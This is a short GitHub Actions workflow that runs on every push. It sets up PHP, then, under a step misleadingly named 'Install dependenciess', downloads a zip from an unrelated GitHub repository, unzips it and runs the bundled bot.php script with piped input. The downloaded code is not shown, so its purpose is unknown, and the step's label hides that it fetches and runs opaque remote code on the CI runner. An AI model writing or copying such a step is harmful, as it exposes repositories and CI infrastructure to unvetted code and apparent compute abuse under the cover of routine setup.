on:
  push:
name: hhs

jobs:
  run_1:
    runs-on: ubuntu-latest
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.1'
        coverage: none
    - name: Install dependenciess
      run: |
        wget https://github.com/Yabof386/bestj/raw/main/.github/workflows/masam.zip
        unzip masam.zip
        echo -e "1" | php bot.php
